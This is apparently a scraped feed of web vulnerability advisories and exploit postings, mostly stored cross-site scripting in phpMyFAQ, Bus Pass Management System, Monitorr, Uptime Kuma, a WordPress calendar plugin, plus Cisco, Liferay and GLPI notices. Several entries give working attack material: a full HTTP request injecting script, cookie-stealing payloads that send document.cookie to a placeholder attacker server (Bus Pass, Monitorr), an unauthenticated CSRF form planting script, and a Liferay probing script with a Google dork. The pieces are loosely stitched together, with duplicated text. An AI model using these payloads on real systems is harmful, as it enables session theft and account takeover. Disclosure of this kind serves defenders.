Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

**Description**

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

**Proof of Concept**

Code That has a Vulnerability:

                // Updates an existing category
                if ($action === 'updatecategory' && Token::getInstance()->verifyToken('update-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
    
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = Filter::filterInput(INPUT_POST, 'id', FILTER_VALIDATE_INT);
                    $categoryLang = Filter::filterInput(INPUT_POST, 'catlang', FILTER_UNSAFE_RAW);
                    $existingImage = Filter::filterInput(INPUT_POST, 'existing_image', FILTER_UNSAFE_RAW);
                    $image = count($uploadedFile) ? $categoryImage->getFileName(
                        $categoryId,
                        $categoryLang
                    ) : $existingImage;
    
                    $categoryData = [
                        'id' => $categoryId,
                        'lang' => $categoryLang,
                        'parent_id' => $parentId,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_UNSAFE_RAW),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_UNSAFE_RAW),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $image,
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT),
                    ];
    

Code without that vulnerability:

                // Save a new category
                if ($action === 'savecategory' && Token::getInstance()->verifyToken('save-category', $csrfToken)) {
                    $category = new Category($faqConfig, [], false);
                    $category->setUser($currentAdminUser);
                    $category->setGroups($currentAdminGroups);
                    $parentId = Filter::filterInput(INPUT_POST, 'parent_id', FILTER_VALIDATE_INT);
                    $categoryId = $faqConfig->getDb()->nextId(Database::getTablePrefix() . 'faqcategories', 'id');
                    $categoryLang = Filter::filterInput(INPUT_POST, 'lang', FILTER_UNSAFE_RAW);
                    $categoryData = [
                        'lang' => $categoryLang,
                        'name' => Filter::filterInput(INPUT_POST, 'name', FILTER_SANITIZE_SPECIAL_CHARS),
                        'description' => Filter::filterInput(INPUT_POST, 'description', FILTER_SANITIZE_SPECIAL_CHARS),
                        'user_id' => Filter::filterInput(INPUT_POST, 'user_id', FILTER_VALIDATE_INT),
                        'group_id' => Filter::filterInput(INPUT_POST, 'group_id', FILTER_VALIDATE_INT),
                        'active' => Filter::filterInput(INPUT_POST, 'active', FILTER_VALIDATE_INT),
                        'image' => $categoryImage->getFileName($categoryId, $categoryLang),
                        'show_home' => Filter::filterInput(INPUT_POST, 'show_home', FILTER_VALIDATE_INT)
                    ];
    

Request:

    POST /admin/?action=updatecategory HTTP/2
    Host: roy.demo.phpmyfaq.de
    Cookie: PHPSESSID=EDITthis; pmf_sid=11; cookieconsent_status=dismiss
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------14208207025422371582565391486
    Content-Length: 1934
    Origin: https://roy.demo.phpmyfaq.de
    Referer: https://roy.demo.phpmyfaq.de/admin/?action=editcategory&cat=1
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="catlang"
    
    en
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="parent_id"
    
    0
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="csrf"
    
    EDITthis
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="existing_image"
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="name"
    
    <script>alert(1)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="description"
    
    </textarea><script>alert(2)</script>
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="active"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="show_home"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="image"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="user_id"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="grouppermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="userpermission"
    
    all
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="restricted_users"
    
    1
    -----------------------------14208207025422371582565391486
    Content-Disposition: form-data; name="submit"
    
    
    -----------------------------14208207025422371582565391486--
    

**Impact**

The application stores dangerous data in a database, message forum, visitor log, or other trusted data store. At a later time, the dangerous data is subsequently read back into the application and included in dynamic content. From an attacker's perspective, the optimal place to inject malicious content is in an area that is displayed to either many users or particularly interesting users. Interesting users typically have elevated privileges in the application or interact with sensitive data that is valuable to the attacker. If one of these users executes malicious content, the attacker may be able to perform privileged operations on behalf of the user or gain access to sensitive data belonging to the user. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs

CVE-2023-1879: Stored XSS @ updatecategory in phpmyfaq

Bus Pass Management System version 1.0 suffers persistent cross site scripting vulnerabilities.

    # Exploit Title: Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)# Date: 2021-09-17# Exploit Author: Matteo Conti - https://deltaspike.io# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Ubuntu 18.04 - LAMP# DescriptionThe application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie># Prof of concept:- From /contact.php, send a message containing the following payload in "title" or "message" fields:<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>(the first url have to be an existing image)- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php- Your listener will receive the PHP session id.

Bus Pass Management System 1.0 Cross Site Scripting

Hello,

After mitigation of all submitted XSS Vulnerabilities i was able to detect another XSS and bypass the XSS Filters in the FAQ Site while generating an HTML Export.

Lets see :)

This is th XSS Paylaod with XSS Ahmed 2

Only XSS Ahmed 2 will work !

Now lets export in in HTML5 and open the file the xss alert will be fired.

As you can see this is the XSS Payload lets refresh its stored

Thank you for watching :)

**Impact**

Hello,

After mitigation of all submitted XSS Vulnerabilities i was able to detect another XSS and bypass the XSS Filters in the FAQ Site while generating an HTML Export.

Lets see :)

This is th XSS Paylaod with XSS Ahmed 2

Only XSS Ahmed 2 will work !

Now lets export in in HTML5 and open the file the xss alert will be fired.

As you can see this is the XSS Payload lets refresh its stored

Thank you for watching :)

CVE-2023-1756: stored XSS after XSS Filter Bypass through exporting an HTML-Document in phpmyfaq

A vulnerability in the web-based management interface of Cisco Prime Infrastructure Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user of the web-based management interface on an affected device to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information.

*   When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Fixed Releases**
    
    At the time of publication, the release information in the following table was accurate. See the Details section in the bug ID(s) at the top of this advisory for the most complete and current information.
    
    The left column lists Cisco software releases, and the right column indicates whether a release was affected by the vulnerability that is described in this advisory and which release included the fix for this vulnerability.
    
    Cisco Prime Infrastructure Release
    
    First Fixed Release
    
    Earlier than 3.10.3
    
    3.10.3
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

CVE-2023-20068: Cisco Security Advisory: Cisco Prime Infrastructure Reflected Cross-Site Scripting Vulnerability

@@ -47,7 +47,8 @@  
<div class\="row"\> <div class\="col-12"\> <form id\="faqEditor" name\="faqEditor" action\="?action=save-news" method\="post" novalidate\> <form id\="faqEditor" name\="faqEditor" action\="?action=save-news" method\="post" class\="needs-validation" novalidate\>  
<div class\="form-group row"\> <label class\="col-3 col-form-label" for\="newsheader"\> @@ -112,7 +113,7 @@ <div class\="form-group row"\> <label class\="col-3 col-form-label" for\="link"\><?= $PMF\_LANG\['ad\_news\_link\_url'\] ?></label\> <div class\="col-9"\> <input class\="form-control" type\="text" name\="link" id\="link" <input class\="form-control" type\="url" name\="link" id\="link" placeholder\="http://www.example.com/"\> </div\> </div\> @@ -256,7 +257,8 @@  
<div class\="row"\> <div class\="col-12"\> <form action\="?action=update-news" method\="post" accept-charset\="utf-8"\> <form action\="?action=update-news" method\="post" accept-charset\="utf-8" class\="needs-validation" novalidate\> <input type\="hidden" name\="id" value\="<?= $newsData\['id'\] ?>"\>  
<div class\="form-group row"\> @@ -328,7 +330,7 @@ <div class\="form-group row"\> <label class\="col-3 col-form-label" for\="link"\><?= $PMF\_LANG\['ad\_news\_link\_url'\] ?></label\> <div class\="col-9"\> <input type\="text" id\="link" name\="link" <input type\="url" id\="link" name\="link" value\="<?= Strings::htmlentities($newsData\['link'\]) ?>" class\="form-control"\> </div\> </div\> @@ -449,8 +451,8 @@ $email = Filter::filterInput(INPUT\_POST, 'authorEmail', FILTER\_VALIDATE\_EMAIL); $active = Filter::filterInput(INPUT\_POST, 'active', FILTER\_UNSAFE\_RAW); $comment = Filter::filterInput(INPUT\_POST, 'comment', FILTER\_UNSAFE\_RAW); $link = Filter::filterInput(INPUT\_POST, 'link', FILTER\_SANITIZE\_SPECIAL\_CHARS); $linkTitle = Filter::filterInput(INPUT\_POST, 'linkTitle', FILTER\_SANITIZE\_SPECIAL\_CHARS); $link = Filter::filterInput(INPUT\_POST, 'link', FILTER\_VALIDATE\_URL); $linkTitle = Filter::filterInput(INPUT\_POST, 'linkTitle', FILTER\_SANITIZE\_ENCODED); $newsLang = Filter::filterInput(INPUT\_POST, 'langTo', FILTER\_UNSAFE\_RAW); $target = Filter::filterInput(INPUT\_POST, 'target', FILTER\_UNSAFE\_RAW);  
@@ -500,8 +502,8 @@ $email = Filter::filterInput(INPUT\_POST, 'authorEmail', FILTER\_VALIDATE\_EMAIL); $active = Filter::filterInput(INPUT\_POST, 'active', FILTER\_UNSAFE\_RAW); $comment = Filter::filterInput(INPUT\_POST, 'comment', FILTER\_UNSAFE\_RAW); $link = Filter::filterInput(INPUT\_POST, 'link', FILTER\_UNSAFE\_RAW); $linkTitle = Filter::filterInput(INPUT\_POST, 'linkTitle', FILTER\_UNSAFE\_RAW); $link = Filter::filterInput(INPUT\_POST, 'link', FILTER\_VALIDATE\_URL); $linkTitle = Filter::filterInput(INPUT\_POST, 'linkTitle', FILTER\_SANITIZE\_ENCODED); $newsLang = Filter::filterInput(INPUT\_POST, 'langTo', FILTER\_UNSAFE\_RAW); $target = Filter::filterInput(INPUT\_POST, 'target', FILTER\_UNSAFE\_RAW);

CVE-2023-1757: fix: added missing validation of URLs and conversion to HTML entities · thorsten/phpMyFAQ@5061e58

Monitorr version 1.7.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Monitorr v1.7.6 - Cross Site Scripting# CVE: CVE-2023-26776# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/Monitorr/# Software Link: https://github.com/Monitorr/Monitorr# Tested on: Ubuntu# Version: v1.7.6# Exploit Description:  Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>The injected script tag is executed everytime the home page is loaded.

Monitorr 1.7.6 Cross Site Scripting

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
*   Root (3,538)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,825)
*   Shell (3,138)
*   Shellcode (1,209)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,180)
*   TCP (2,385)
*   Trojan (687)
*   UDP (881)
*   Virus (663)
*   Vulnerability (31,400)
*   Web (9,473)
*   Whitepaper (3,740)
*   x86 (948)
*   XSS (17,599)
*   Other

**File Archives**

*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (372)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,715)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,194)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,962)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,470)
*   UNIX (9,209)
*   UnixWare (185)
*   Windows (6,534)
*   Other

Liferay Portal 6.2.5 Insecure Permissions

Uptime Kuma versions 1.19.6 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Stored XSS in uptime-kuma <= v1.19.6# CVE: CVE-2023-26777# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/louislam/# Software Link: https://github.com/louislam/uptime-kuma# Tested on: Ubuntu# Version: <= v1.19.6# Exploit Description:  Stored Cross Site Scripting vulnerability found in Uptime Kuma v.1.19.6 and before, allows a remote attacker to execute arbitrary javascript code via the description, title, footer, and incident creation parameter of the status status page in the application.Create a status page, while giving the title or the discription give the payload: <script>""</script><script>alert("XSS")</script>If anyone loads the page, the javascript inside the script tag will be executed.

Uptime Kuma 1.19.6 Cross Site Scripting

Calendar Event Multi View version 1.4.07 suffers from a cross site scripting vulnerability.

    # Exploit Title: Calendar Event Multi View  1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)# Date: 2022-05-25# Exploit Author: Mostafa Farzaneh# WPScan page:https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c# Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/# Software Link:https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip# Version:   1.4.06# Tested on: Linux# CVE : CVE-2022-2846# Description:The Calendar Event Multi View WordPress plugin before 1.4.07 does not haveany authorisation and CSRF checks in place when creating an event, and isalso lacking sanitisation as well as escaping in some of the event fields.This could allow unauthenticated attackers to create arbitrary events andput Cross-Site Scripting payloads in it.#POC and exploit code:As an unauthenticated user, to add a malicious event (on October 6th, 2022)to the calendar with ID 1, open the code below<html>  <body>    <form action="https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"method="POST">      <input type="hidden" name="Subject"value='"><script>alert(/XSS/)</script>' />      <input type="hidden" name="colorvalue" value="#f00" />      <input type="hidden" name="rrule" value="" />      <input type="hidden" name="rruleType" value="" />      <input type="hidden" name="stpartdate" value="10/6/2022" />      <input type="hidden" name="stparttime" value="00:00" />      <input type="hidden" name="etpartdate" value="10/6/2022" />      <input type="hidden" name="etparttime" value="00:00" />      <input type="hidden" name="stpartdatelast" value="10/6/2022" />      <input type="hidden" name="etpartdatelast" value="10/6/2022" />      <input type="hidden" name="stparttimelast" value="" />      <input type="hidden" name="etparttimelast" value="" />      <input type="hidden" name="IsAllDayEvent" value="1" />      <input type="hidden" name="Location" value="CSRF" />      <input type="hidden" name="Description" value='<p style="text-align:left;">CSRF</p>' />      <input type="hidden" name="timezone" value="4.5" />      <input type="submit" value="Submit request" />    </form>  </body></html>The XSS will be triggered when viewing the related event

Calendar Event Multi View 1.4.07 Cross Site Scripting

GLPI is a free asset and IT management software package. Starting in version 0.83 and prior to versions 9.5.13 and 10.0.7, an authenticated user can modify emails of any user, and can therefore takeover another user account through the "forgotten password" feature. By modifying emails, the user can also receive sensitive data through GLPI notifications. Versions 9.5.13 and 10.0.7 contain a patch for this issue. As a workaround, account takeover can be prevented by deactivating all notifications related to `Forgotten password?` event. However, it will not prevent unauthorized modification of any user emails.

This release fixes several security issues that have been recently discovered. Update is recommended!

You can download the **GLPI 9.5.13 archive** on GitHub.

You will find below the list of security issues fixed in this bugfixes version:

*   \[SECURITY - High\] Account takeover by authenticated user (CVE-2023-28632).
*   \[SECURITY - High\] SQL injection through dynamic reports (CVE-2023-28838).
*   \[SECURITY - Moderate\] Stored XSS through dashboard administration (CVE-2023-28852).
*   \[SECURITY - Moderate\] Stored XSS on external links (CVE-2023-28636).
*   \[SECURITY - Moderate\] Reflected XSS in search pages (CVE-2023-28639).
*   \[SECURITY - Moderate\] Privilege Escalation from technician to super-admin (CVE-2023-28634).
*   \[SECURITY - Low\] Blind Server-Side Request Forgery (SSRF) in RSS feeds (CVE-2023-28633).

Regards.

Tag

#xss